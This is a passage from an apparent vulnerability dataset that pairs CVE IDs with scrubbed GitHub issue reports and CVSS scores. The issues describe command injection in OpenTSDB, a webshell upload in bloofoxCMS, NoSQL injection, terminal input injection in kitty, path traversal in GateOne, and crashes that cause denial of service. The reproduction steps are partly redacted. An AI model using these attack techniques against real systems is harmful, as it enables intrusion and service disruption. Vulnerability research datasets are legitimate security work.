  59808. "description": "crash when udp packet size large than NUMBERTAG crash when udp packet size large than NUMBERTAG Description envoy crash when udp packet size large than NUMBERTAG Is there any way to modify the packet size limit? Repro steps start envoy crash shen receive packget that size large than NUMBERTAG ERRORTAG Config yaml admin: access_log_path: /tmp/admin_access.log address: socket_address: protocol: TCP address NUMBERTAG port_value NUMBERTAG static_resources: listeners: name: listener_udp reuse_port: true address: socket_address: protocol: UDP address NUMBERTAG port_value NUMBERTAG listener_filters: name: APITAG typed_config: ' APITAG APITAG stat_prefix: service cluster: conf_jira_udp clusters: name: conf_jira_udp connect_timeout NUMBERTAG s type: STATIC lb_policy: ROUND_ROBIN load_assignment: cluster_name: conf_jira_udp endpoints: lb_endpoints: endpoint: address: socket_address: address: APITAG port_value NUMBERTAG Logs ERRORTAG",
  59809. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59810. "severity": "HIGH",
  59811. "baseScore": 7.5,
  59812. "impactScore": 3.6,
  59813. "exploitabilityScore": 3.9
  59814. },
  59815. {
  59816. "CVE_ID": "CVE-2020-35476",
  59817. "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/2051",
  59818. "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/2051",
  59819. "Repo_new": "opentsdb/opentsdb",
  59820. "Issue_Created_At": "2020-11-18T09:02:48Z",
  59821. "description": "APITAG NUMBERTAG Remote Code Execution. During a Pentest we found a remote code execution vulnerability in APITAG NUMBERTAG and below using command injection in the yrange parameter (other parameters might be vulnerable as well) When passing the payload via one of the parameters it is written to a gnuplot file in the /tmp directory and the gnuplot file is executed by APITAG via the FILETAG shell script. There was an attempt to block command injections by blocking back ticks but we were able to bypass it: PATHTAG ERRORTAG Bypass Payload: APITAG APITAG URLTAG The gnuplot file created in the temp directory by APITAG would look something like this: ERRORTAG When executed by APITAG FILETAG the FILETAG file will be written to the temp directory.",
  59822. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59823. "severity": "CRITICAL",
  59824. "baseScore": 9.8,
  59825. "impactScore": 5.9,
  59826. "exploitabilityScore": 3.9
  59827. },
  59828. {
  59829. "CVE_ID": "CVE-2020-35490",
  59830. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2986",
  59831. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2986",
  59832. "Repo_new": "fasterxml/jackson-databind",
  59833. "Issue_Created_At": "2020-12-14T21:48:07Z",
  59834. "description": "Block one more gadget type ( , CVE xxxx xxx). (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Mitre id: [to be allocated] Reporter(s): Fix will be included in:",
  59835. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59836. "severity": "HIGH",
  59837. "baseScore": 8.1,
  59838. "impactScore": 5.9,
  59839. "exploitabilityScore": 2.2
  59840. },
  59841. {
  59842. "CVE_ID": "CVE-2020-35518",
  59843. "Issue_Url_old": "https://github.com/389ds/389-ds-base/issues/4480",
  59844. "Issue_Url_new": "https://github.com/389ds/389-ds-base/issues/4480",
  59845. "Repo_new": "389ds/389-ds-base",
  59846. "Issue_Created_At": "2020-12-08T16:04:36Z",
  59847. "description": "Unexpected info returned to ldap request. Issue Description A ldap result can contain additional information. Such information should not allow a client application to guess if an entry exists or not Package Version and Platform: This bug impacts all release after NUMBERTAG Steps to Reproduce to be provided with an automatic testcase Expected results A ldap request should not provide any tips if an entry exists or not",
  59848. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  59849. "severity": "MEDIUM",
  59850. "baseScore": 5.3,
  59851. "impactScore": 1.4,
  59852. "exploitabilityScore": 3.9
  59853. },
  59854. {
  59855. "CVE_ID": "CVE-2020-35579",
  59856. "Issue_Url_old": "https://github.com/tindy2013/subconverter/issues/284",
  59857. "Issue_Url_new": "https://github.com/tindy2013/subconverter/issues/284",
  59858. "Repo_new": "tindy2013/subconverter",
  59859. "Issue_Created_At": "2020-12-19T14:52:24Z",
  59860. "description": "vulnerability] Loop Request\u68c0\u6d4b\u5b58\u5728\u95ee\u9898\uff0c\u53ef\u5b9e\u73b0\u62d2\u7edd\u670d\u52a1\u653b\u51fb / Loop Request detection is too fragile and can realize denial of service attacks.. \u6f0f\u6d1e\u5371\u5bb3 \u901a\u8fc7\u53d1\u9001\u4e00\u4e2a\u8bf7\u6c42\u5230\u670d\u52a1\u5668\uff0c\u5b9e\u73b0\u62d2\u7edd\u670d\u52a1/\u670d\u52a1\u7f13\u6162 \u6f0f\u6d1e\u539f\u7406 \u901a\u8fc7\u7cbe\u5fc3\u6784\u9020\u7684\u8bf7\u6c42\u5934\uff0c\u7ed5\u8fc7 Loop request \u9632\u5fa1\uff0c\u914d\u5408HTTP NUMBERTAG Loop request \u653b\u51fb\u3002 \u8be5\u7a0b\u5e8f\u5b58\u5728\u4e00\u4e2a\u516c\u5f00\u8bbf\u95ee\u7684[\u5916\u90e8API URLTAG : APITAG \u5176\u4e2d\u7684\u4e00\u4e2a\u540d\u4e3a url APITAG url \u7684 GET NUMBERTAG Loop request \u6211\u4eec\u53ef\u4ee5\u6784\u9020\u8fd9\u6837\u7684\u4e00\u4e2aurl\uff0c\u6211\u4eec\u53eb\u5b83 APITAG \uff1a APITAG \u5176\u4e2d APITAG \u4e5f\u662f\u4e00\u4e2aurl\uff0c\u5728\u4efb\u4f55\u65f6\u5019\u5b83\u90fd\u8fd4\u56de\u4e00\u4e2a APITAG \u54cd\u5e94\uff0c\u5c06\u8bf7\u6c42\u91cd\u5b9a\u5411\u5230 APITAG APITAG \u5411\u8be5\u670d\u52a1\u5668\u53d1\u9001\u4e00\u4e2aGET\u8bf7\u6c42\uff0curl\u662f APITAG \uff0c\u670d\u52a1\u5668\u4f1a\u8bf7\u6c42 APITAG \u3002\u7531\u4e8e\u91cd\u5b9a\u5411\uff0c\u670d\u52a1\u5668\u4f1a\u8bbf\u95ee APITAG \uff08\u81ea\u5df1\u8bbf\u95ee\u81ea\u5df1\uff09\uff0c\u9020\u6210 Loop request FILETAG APITAG NUMBERTAG Loop request \u9632\u5fa1 \u8be5\u7a0b\u5e8f\u901a\u8fc7\u68c0\u67e5\u8bf7\u6c42\u5934\u6765\u5b9e\u65bd\u5bf9 Loop request \u653b\u51fb\u7684\u9632\u5fa1\uff1a \u5728\u5411\u5916\u90e8\u53d1\u9001\u8bf7\u6c42\u65f6\uff0c\u4f1a\u5e26\u4e0a\u4e00\u4e2a\u81ea\u5b9a\u4e49\u7684\u8bf7\u6c42\u5934 APITAG \uff1a URLTAG \u901a\u8fc7\u68c0\u67e5\u8bf7\u6c42\u5934\u4e2d\u662f\u5426\u5305\u542b APITAG \uff0c\u4e14\u5b83\u7684\u503c\u662f\u5426\u4e3a APITAG \u6765\u62d2\u7edd Loop request \uff1a URLTAG URLTAG FILETAG 
\u4f46\u662f\u8be5\u68c0\u6d4b\u65b9\u5f0f\u5b58\u5728\u6f0f\u6d1e\u3002 \u5728\u670d\u52a1\u5668\u53d1\u51fa\u8bf7\u6c42 APITAG \u65f6\uff0c\u4f1a\u987a\u5e26\u5c06\u653b\u51fb\u8005\u8bf7\u6c42 APITAG \u65f6\u53d1\u9001\u7684\u6240\u6709HTTP\u8bf7\u6c42\u5934\u4e5f\u5e26\u4e0a\uff0c\u50cf\u4e0b\u9762\u8fd9\u6837\uff1a FILETAG \u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u7528curl\u8bf7\u6c42 APITAG \uff0c\u5e76\u4e14\u5305\u542b\u4e00\u4e2a\u53eb\u505a APITAG \u7684\u8bf7\u6c42\u5934\uff0c\u4f46\u662f\u503c\u4e0d\u662f APITAG \uff0c\u800c\u662f APITAG \uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5f97\u5230\uff0c\u4e24\u4e2a APITAG \ud83d\udca5\ud83d\udca5 FILETAG \u7a0b\u5e8f\u4f7f\u7528libev\u7684 evhttp_find_header URLTAG APITAG APITAG \u7684\u503c\u88ab\u6211\u4eec\u8986\u76d6\u6210\u4e86 APITAG \uff0c\u4ece\u800c\u7ed5\u8fc7\u4e86 Loop request NUMBERTAG FILETAG \u4e0b\u8f7d\u53d1\u5e03\u7684\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u5728\u672c\u5730\u542f\u52a8\u4e00\u4e2a\u670d\u52a1\u7a0b\u5e8f\uff1a APITAG NUMBERTAG APITAG \uff1a URLTAG \u5176\u4e2d APITAG \u662f\u4e00\u4e2a\u77ed\u94fe\u63a5\u670d\u52a1\uff1a URLTAG NUMBERTAG APITAG \uff1a CODETAG NUMBERTAG APITAG \u8bf7\u6c42\uff1a APITAG \u8be5\u8bf7\u6c42\u53d1\u51fa\u540e\uff0c\u7a0b\u5e8f\u5f00\u59cb\u8fdb\u5165\u65e0\u9650\u7684 Loop Request FILETAG \u6b64\u540e\u65b0\u7684\u8bf7\u6c42\u5230\u6765\u65f6\u8868\u73b0\u4e3a\u8bf7\u6c42\u7f13\u6162\uff0c\u6216\u8005\u62d2\u7edd\u670d\u52a1 \u4fee\u590d\u5efa\u8bae \u53bb\u6389 APITAG \u51fd\u6570\uff0c\u5c06\u68c0\u6d4b\u903b\u8f91\u6539\u6210\u68c0\u6d4b APITAG \u5934\u662f\u5426\u5b58\u5728 URLTAG",
  59861. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59862. "severity": "HIGH",
  59863. "baseScore": 7.5,
  59864. "impactScore": 3.6,
  59865. "exploitabilityScore": 3.9
  59866. },
  59867. {
  59868. "CVE_ID": "CVE-2020-35597",
  59869. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/16",
  59870. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/16",
  59871. "Repo_new": "victoralagwu/cmssite",
  59872. "Issue_Created_At": "2020-12-17T11:42:51Z",
  59873. "description": "SQL Injection vulnerabilities in different features. Following parameters are vulnerable to SQL Injection. I will try to fix these vulnerabilities.",
  59874. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59875. "severity": "HIGH",
  59876. "baseScore": 8.8,
  59877. "impactScore": 5.9,
  59878. "exploitabilityScore": 2.8
  59879. },
  59880. {
  59881. "CVE_ID": "CVE-2020-35605",
  59882. "Issue_Url_old": "https://github.com/kovidgoyal/kitty/issues/3128",
  59883. "Issue_Url_new": "https://github.com/kovidgoyal/kitty/issues/3128",
  59884. "Repo_new": "kovidgoyal/kitty",
  59885. "Issue_Created_At": "2020-11-29T06:25:25Z",
  59886. "description": "Input injection via graphic protocol. Describe the bug When attempting to load an image file, the graphic protocol can reply with a message containing the faulty image filename in a decoded form (i.e. not base NUMBERTAG thus allowing for arbitrary input to be inserted. To Reproduce Here is a simple example showing how an attacker could craft a FILETAG file that would cause the execution of arbitrary commands when displayed using cat on kitty. ERRORTAG In Kitty, run APITAG from the shell prompt to perform the input injection ERRORTAG Remark: The other failed commands are caused by the rest of the escape reply. The input sequence ESC+underscore is typically interpreted by readline as the command yank last arg thus causing the last argument of the last command (in that case, that is APITAG to be inserted.",
  59887. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59888. "severity": "CRITICAL",
  59889. "baseScore": 9.8,
  59890. "impactScore": 5.9,
  59891. "exploitabilityScore": 3.9
  59892. },
  59893. {
  59894. "CVE_ID": "CVE-2020-35666",
  59895. "Issue_Url_old": "https://github.com/steedos/steedos-platform/issues/1245",
  59896. "Issue_Url_new": "https://github.com/steedos/steedos-platform/issues/1245",
  59897. "Repo_new": "steedos/steedos-platform",
  59898. "Issue_Created_At": "2020-12-22T02:37:45Z",
  59899. "description": "Mongodb APITAG \u6ce8\u5165\u95ee\u9898. \u63a5\u53e3\u5bf9mongodb nosql\u64cd\u4f5c\u9a8c\u8bc1\u4e0d\u4e25\uff0c\u53ef\u80fd\u5bfc\u81f4nosql\u6ce8\u5165\u3002\u8be6\u7ec6\u53ef\u53c2\u8003 FILETAG \u5927\u591a\u6570\u63a5\u53e3\u5b58\u5728\u9274\u6743\u6240\u4ee5\u672a\u767b\u5f55\u65e0\u6cd5\u5229\u7528\uff0c\u8fd9\u91cc\u4ec5\u4ec5\u4e3e\u4e00\u4e2a\u4f8b\u5b50 \u6f0f\u6d1e\u4ea7\u751f\u539f\u56e0 \u4f8b\u5982\u5728 PATHTAG \u4e2d\uff0c\u5b58\u5728\u5982\u4e0b\u4ee3\u7801\uff1a ERRORTAG APITAG APITAG operator URLTAG \u6784\u9020 X User Id[$ne NUMBERTAG user: {\"$ne NUMBERTAG space_user NUMBERTAG URLTAG \u8fdb\u884cdocker NUMBERTAG CODETAG \u5efa\u8bae\uff1a\u5e94\u8be5\u5728nosql\u64cd\u4f5c\u524d\u9a8c\u8bc1\u53c2\u6570\u7c7b\u578b",
  59900. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59901. "severity": "HIGH",
  59902. "baseScore": 8.8,
  59903. "impactScore": 5.9,
  59904. "exploitabilityScore": 2.8
  59905. },
  59906. {
  59907. "CVE_ID": "CVE-2020-35668",
  59908. "Issue_Url_old": "https://github.com/RedisGraph/RedisGraph/issues/1502",
  59909. "Issue_Url_new": "https://github.com/redisgraph/redisgraph/issues/1502",
  59910. "Repo_new": "redisgraph/redisgraph",
  59911. "Issue_Created_At": "2020-12-21T14:41:21Z",
  59912. "description": "APITAG APITAG Of Service) Bug. Bug impact Redis Graph crashes and server downs Bug explained It's appear that Redis Graph doesn't processes well list of unknown data types. Typing this in the CLI, server crashes: APITAG It also crashes with any invalid values in A . Redis Bug report === REDIS BUG REPORT START: Cut & paste starting from here NUMBERTAG M NUMBERTAG Dec NUMBERTAG Redis NUMBERTAG crashed by signal NUMBERTAG M NUMBERTAG Dec NUMBERTAG Crashed running the instruction at NUMBERTAG f NUMBERTAG a6e NUMBERTAG M NUMBERTAG Dec NUMBERTAG Accessing address NUMBERTAG M NUMBERTAG Dec NUMBERTAG Failed assertion: <no assertion failed> (<no file NUMBERTAG STACK TRACE EIP: PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG a6e NUMBERTAG Backtrace: redis server APITAG redis server APITAG PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG a6e NUMBERTAG PATHTAG APITAG PATHTAG NUMBERTAG b7c7e NUMBERTAG f NUMBERTAG a6e3c7e] PATHTAG APITAG PATHTAG NUMBERTAG b7c7e NUMBERTAG f NUMBERTAG a6e3c7e] PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG NUMBERTAG fb5ad NUMBERTAG f NUMBERTAG a NUMBERTAG ad] PATHTAG NUMBERTAG fa NUMBERTAG f NUMBERTAG b NUMBERTAG fa3] PATHTAG (clone NUMBERTAG f NUMBERTAG f NUMBERTAG b7b NUMBERTAG cf] INFO OUTPUT Server redis_version NUMBERTAG redis_git_sha NUMBERTAG redis_git_dirty NUMBERTAG APITAG redis_mode:standalone APITAG NUMBERTAG linuxkit NUMBERTAG arch_bits NUMBERTAG multiplexing_api:epoll atomicvar_api:atomic builtin gcc_version NUMBERTAG process_id NUMBERTAG APITAG tcp_port NUMBERTAG uptime_in_seconds NUMBERTAG uptime_in_days NUMBERTAG hz NUMBERTAG configured_hz NUMBERTAG lru_clock NUMBERTAG PATHTAG config_file: Clients connected_clients NUMBERTAG APITAG APITAG blocked_clients NUMBERTAG tracking_clients NUMBERTAG clients_in_timeout_table NUMBERTAG Memory used_memory NUMBERTAG used_memory_human NUMBERTAG M used_memory_rss NUMBERTAG used_memory_rss_human NUMBERTAG M used_memory_peak 
NUMBERTAG used_memory_peak_human NUMBERTAG M used_memory_peak_perc NUMBERTAG used_memory_overhead NUMBERTAG used_memory_startup NUMBERTAG used_memory_dataset NUMBERTAG APITAG allocator_allocated NUMBERTAG allocator_active NUMBERTAG allocator_resident NUMBERTAG APITAG APITAG used_memory_lua NUMBERTAG used_memory_lua_human NUMBERTAG K used_memory_scripts NUMBERTAG used_memory_scripts_human NUMBERTAG B number_of_cached_scripts NUMBERTAG maxmemory NUMBERTAG maxmemory_human NUMBERTAG B maxmemory_policy:noeviction allocator_frag_ratio NUMBERTAG allocator_frag_bytes NUMBERTAG allocator_rss_ratio NUMBERTAG allocator_rss_bytes NUMBERTAG rss_overhead_ratio NUMBERTAG rss_overhead_bytes NUMBERTAG mem_fragmentation_ratio NUMBERTAG APITAG mem_not_counted_for_evict NUMBERTAG mem_replication_backlog NUMBERTAG mem_clients_slaves NUMBERTAG mem_clients_normal NUMBERTAG mem_aof_buffer NUMBERTAG mem_allocator:jemalloc NUMBERTAG active_defrag_running NUMBERTAG lazyfree_pending_objects NUMBERTAG Persistence loading NUMBERTAG rdb_changes_since_last_save NUMBERTAG rdb_bgsave_in_progress NUMBERTAG rdb_last_save_time NUMBERTAG rdb_last_bgsave_status:ok rdb_last_bgsave_time_sec NUMBERTAG rdb_current_bgsave_time_sec NUMBERTAG rdb_last_cow_size NUMBERTAG aof_enabled NUMBERTAG aof_rewrite_in_progress NUMBERTAG aof_rewrite_scheduled NUMBERTAG aof_last_rewrite_time_sec NUMBERTAG aof_current_rewrite_time_sec NUMBERTAG aof_last_bgrewrite_status:ok aof_last_write_status:ok aof_last_cow_size NUMBERTAG module_fork_in_progress NUMBERTAG module_fork_last_cow_size NUMBERTAG Stats total_connections_received NUMBERTAG total_commands_processed NUMBERTAG instantaneous_ops_per_sec NUMBERTAG total_net_input_bytes NUMBERTAG total_net_output_bytes NUMBERTAG APITAG APITAG rejected_connections NUMBERTAG sync_full NUMBERTAG sync_partial_ok NUMBERTAG sync_partial_err NUMBERTAG expired_keys NUMBERTAG expired_stale_perc NUMBERTAG APITAG APITAG evicted_keys NUMBERTAG keyspace_hits NUMBERTAG keyspace_misses NUMBERTAG 
pubsub_channels NUMBERTAG pubsub_patterns NUMBERTAG latest_fork_usec NUMBERTAG migrate_cached_sockets NUMBERTAG slave_expires_tracked_keys NUMBERTAG active_defrag_hits NUMBERTAG active_defrag_misses NUMBERTAG active_defrag_key_hits NUMBERTAG active_defrag_key_misses NUMBERTAG tracking_total_keys NUMBERTAG tracking_total_items NUMBERTAG tracking_total_prefixes NUMBERTAG unexpected_error_replies NUMBERTAG Replication role:master connected_slaves NUMBERTAG APITAG APITAG master_repl_offset NUMBERTAG second_repl_offset NUMBERTAG repl_backlog_active NUMBERTAG repl_backlog_size NUMBERTAG APITAG repl_backlog_histlen NUMBERTAG CPU APITAG APITAG APITAG APITAG Modules APITAG Commandstats APITAG Cluster cluster_enabled NUMBERTAG Keyspace APITAG CLIENT LIST OUTPUT id NUMBERTAG APITAG fd NUMBERTAG name= age NUMBERTAG idle NUMBERTAG flags=b db NUMBERTAG sub NUMBERTAG psub NUMBERTAG multi NUMBERTAG qbuf NUMBERTAG qbuf free NUMBERTAG obl NUMBERTAG oll NUMBERTAG omem NUMBERTAG events=r APITAG user=default REGISTERS NUMBERTAG M NUMBERTAG Dec NUMBERTAG RA NUMBERTAG RB NUMBERTAG f NUMBERTAG f NUMBERTAG RC NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG RD NUMBERTAG f NUMBERTAG ab0 RDI NUMBERTAG a0 RSI NUMBERTAG RBP NUMBERTAG RSP NUMBERTAG f NUMBERTAG f0 R NUMBERTAG R NUMBERTAG f R NUMBERTAG R NUMBERTAG f NUMBERTAG f NUMBERTAG R NUMBERTAG R NUMBERTAG f NUMBERTAG b NUMBERTAG d9f8 R NUMBERTAG R NUMBERTAG RIP NUMBERTAG f NUMBERTAG a6e NUMBERTAG EFL NUMBERTAG CSGSFS NUMBERTAG b NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG ff NUMBERTAG f NUMBERTAG ab NUMBERTAG e NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fe NUMBERTAG f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fd NUMBERTAG f NUMBERTAG a6e3c7e NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fc NUMBERTAG f NUMBERTAG f1c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fb NUMBERTAG f NUMBERTAG a6e NUMBERTAG c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG fa NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG M NUMBERTAG Dec 
NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG d9f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f1c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG adb3ba NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f1c NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG e NUMBERTAG c6f NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG ab NUMBERTAG e NUMBERTAG M NUMBERTAG Dec NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG MODULES INFO OUTPUT graph_executing commands FAST MEMORY TEST NUMBERTAG M NUMBERTAG Dec NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG Dec NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG Dec NUMBERTAG Bio thread for job type NUMBERTAG terminated Preparing to test memory region NUMBERTAG e NUMBERTAG eae NUMBERTAG bytes) Preparing to test memory region NUMBERTAG e NUMBERTAG bf NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG aa NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d2a NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG d2c NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG adfd NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG ae NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b6b NUMBERTAG bytes) Preparing to test memory 
region NUMBERTAG f NUMBERTAG b NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG b NUMBERTAG c NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bb NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bdad NUMBERTAG bytes) Preparing to test memory region NUMBERTAG f NUMBERTAG bdda NUMBERTAG bytes) .O.O.O.O.O.O.O.O.%",
  59913. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59914. "severity": "HIGH",
  59915. "baseScore": 7.5,
  59916. "impactScore": 3.6,
  59917. "exploitabilityScore": 3.9
  59918. },
  59919. {
  59920. "CVE_ID": "CVE-2020-35700",
  59921. "Issue_Url_old": "https://github.com/librenms/librenms/issues/12405",
  59922. "Issue_Url_new": "https://github.com/librenms/librenms/issues/12405",
  59923. "Repo_new": "librenms/librenms",
  59924. "Issue_Created_At": "2020-12-22T14:03:39Z",
  59925. "description": "security issue. Hi, can I please get a point of contact to report a security issue? The email address EMAILTAG rg is bouncing. Thanks!",
  59926. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59927. "severity": "HIGH",
  59928. "baseScore": 8.8,
  59929. "impactScore": 5.9,
  59930. "exploitabilityScore": 2.8
  59931. },
  59932. {
  59933. "CVE_ID": "CVE-2020-35701",
  59934. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/4022",
  59935. "Issue_Url_new": "https://github.com/cacti/cacti/issues/4022",
  59936. "Repo_new": "cacti/cacti",
  59937. "Issue_Created_At": "2020-12-24T15:37:03Z",
  59938. "description": "SQL Injection in FILETAG . Describe the bug Due to a lack of validation, FILETAG can be the source of a SQL injection. Expected behavior Cacti should be safe from SQL injections",
  59939. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  59940. "severity": "HIGH",
  59941. "baseScore": 8.8,
  59942. "impactScore": 5.9,
  59943. "exploitabilityScore": 2.8
  59944. },
  59945. {
  59946. "CVE_ID": "CVE-2020-35709",
  59947. "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/7",
  59948. "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/7",
  59949. "Repo_new": "alexlang24/bloofoxcms",
  59950. "Issue_Created_At": "2020-12-25T13:27:07Z",
  59951. "description": "An arbitrary file upload vulnerability was found. I want to report an arbitrary file upload vulnerability that I found in bloofoxcms NUMBERTAG through which we can upload webshell and control the web server. After entering the web management background, we can use the upload function to upload files\uff1a FILETAG We create a new webshell file and name it FILETAG \uff1a APITAG Click to select this APITAG : FILETAG Click upload file(s) and grab the data package: FILETAG First request package: ERRORTAG First response package \uff1a CODETAG Then we follow NUMBERTAG redirection\uff0c Second request package \uff1a CODETAG Second response package \uff1a ERRORTAG We can see that the file has been successfully uploaded to PATHTAG FILETAG Finally, we can access the webshell address and execute any command\uff1a FILETAG",
  59952. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  59953. "severity": "MEDIUM",
  59954. "baseScore": 4.9,
  59955. "impactScore": 3.6,
  59956. "exploitabilityScore": 1.2
  59957. },
  59958. {
  59959. "CVE_ID": "CVE-2020-35711",
  59960. "Issue_Url_old": "https://github.com/vorner/arc-swap/issues/45",
  59961. "Issue_Url_new": "https://github.com/vorner/arc-swap/issues/45",
  59962. "Repo_new": "vorner/arc-swap",
  59963. "Issue_Created_At": "2020-12-10T03:13:06Z",
  59964. "description": "APITAG dereferences to a dangling pointer. Hello fellow Rustacean, we APITAG group APITAG gatech) are scanning Rust code on crates.io for potential memory safety and soundness bugs and found an issue in this crate which allows safe Rust code to exhibit an undefined behavior. Issue Description URLTAG URLTAG As noted in the comment, unsafe code in APITAG expects the underlying guard type to dereferences to the same value even when the guard object is moved. However, Map uses Access as a trait bound which does not guarantee this property. As a result, Map accesses a dangling pointer when it is used with an Access implementation that does not dereferences to the same value when moved. URLTAG Constant seems to be the only type in this crate that implements Access in this way, but there can be other user types that implements Access on their own. Reproduction Below is an example program that segfaults, written only with safe APIs of APITAG . APITAG Detail APITAG APITAG ERRORTAG Output: CODETAG Tested Environment Crate: arc swap Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG APITAG APITAG",
  59965. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59966. "severity": "HIGH",
  59967. "baseScore": 7.5,
  59968. "impactScore": 3.6,
  59969. "exploitabilityScore": 3.9
  59970. },
  59971. {
  59972. "CVE_ID": "CVE-2020-35734",
  59973. "Issue_Url_old": "https://github.com/sruupl/batflat/issues/98",
  59974. "Issue_Url_new": "https://github.com/sruupl/batflat/issues/98",
  59975. "Repo_new": "sruupl/batflat",
  59976. "Issue_Created_At": "2021-01-20T13:41:48Z",
  59977. "description": "Code injection vulnerability in Batflat NUMBERTAG Users tab. Users tab attributes aren't sanitized and some of them allow for code injection. This means that an authenticated user with access to Users tab can execute arbitrary code on the web server with application privileges. Adding user with PHP code in APITAG name\" field: FILETAG PHP being executed: FILETAG",
  59978. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  59979. "severity": "HIGH",
  59980. "baseScore": 7.2,
  59981. "impactScore": 5.9,
  59982. "exploitabilityScore": 1.2
  59983. },
  59984. {
  59985. "CVE_ID": "CVE-2020-35736",
  59986. "Issue_Url_old": "https://github.com/liftoff/GateOne/issues/747",
  59987. "Issue_Url_new": "https://github.com/liftoff/gateone/issues/747",
  59988. "Repo_new": "liftoff/gateone",
  59989. "Issue_Created_At": "2020-12-27T09:05:04Z",
  59990. "description": "An Arbitrary File Download Vulnerability. Gateone has a vulnerability that allows arbitrary file download without authentication, which can traverse the directory and read arbitrary files on the target system. > Code auditing View the file FILETAG In line NUMBERTAG you can find the place to set the handlers, FILETAG You can see that _downloads/_ did not use the APITAG that comes with Tornado, but the method written by the author himself, which may have vulnerabilities. You can find the definition of the get method on line NUMBERTAG ERRORTAG Pay attention to the key part. You can see that the path is spelled into filepath without any filtering. There is directory traversal, and any file can be read. FILETAG > Recurrence of vulnerability Use the official docker image to build the test environment NUMBERTAG Pull image APITAG NUMBERTAG Run image ERRORTAG After installation, visit URLTAG Just ignore it if the browser may report that it is not safe. FILETAG Packet 